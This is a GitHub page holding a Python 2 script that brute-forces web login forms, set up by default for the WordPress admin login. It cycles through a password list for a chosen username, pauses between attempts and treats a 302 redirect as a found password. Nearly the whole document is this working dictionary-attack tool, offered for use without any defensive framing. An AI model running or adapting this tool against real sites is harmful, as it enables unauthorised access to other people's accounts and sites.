-
Notifications
You must be signed in to change notification settings - Fork 26
/
mechanize_webform_brute.py
93 lines (73 loc) · 2.71 KB
/
mechanize_webform_brute.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
#/bin/python
# Default is set up for a wordpress admin form
import mechanize
import logging
import time
from optparse import OptionParser
from urllib2 import HTTPError
form_username = 'log'
form_password = 'pwd'
form_submit = 'wp-submit'
def brute_server(server, user, password_list):
br = mechanize.Browser()
br.set_handle_equiv(False)
br.set_handle_redirect(False)
br.set_handle_referer(False)
br.set_handle_robots(False)
br.open(server)
pass_list = open(password_list)
for x in pass_list.readlines():
try:
time.sleep(3)
br.select_form( nr = 0 )
br.form[form_username] = user
br.form[form_password] = ''.join(x)
print "Checking ",''.join(x)
request = br.click(name=form_submit)
response = br.open(request)
if response.code == 200:
print "No dice..."
except HTTPError, e:
if e.code == 302: # Redirect is our success case
print "Correct password is ",''.join(x)
def main():
# Setup the command line arguments.
optp = OptionParser()
# Output verbosity options
optp.add_option('-q', '--quiet', help='set logging to ERROR',
action='store_const', dest='loglevel',
const=logging.ERROR, default=logging.INFO)
optp.add_option('-d', '--debug', help='set logging to DEBUG',
action='store_const', dest='loglevel',
const=logging.DEBUG, default=logging.INFO)
optp.add_option('-v', '--verbose', help='set logging to COMM',
action='store_const', dest='loglevel',
const=5, default=logging.INFO)
# Option for target web form to brute
optp.add_option("-t", "--target", dest="target",
help="The target form to brute")
# Option for username to attack
optp.add_option("-u", "--user", dest="user",
help="The username field of the form")
# Option for target web form to brute
optp.add_option("-p", "--password", dest="password",
help="The password list to use in the dictionary attack")
opts, args = optp.parse_args()
if opts.target is None:
opts.target = raw_input("What is the target page with the form: ")
if opts.user is None:
opts.user = raw_input("What is the username to brute force: ")
if opts.password is None:
opts.password = raw_input("What is the password list file to use: ")
# Setup logging.
logging.basicConfig(level=opts.loglevel,
format='%(levelname)-8s %(message)s')
# Main Event Loop:
try:
brute_server(opts.target, opts.user, opts.password)
except (KeyboardInterrupt, EOFError) as e:
print "Exiting..."
exit(0)
print "Completed Password List!"
if __name__ == '__main__':
main()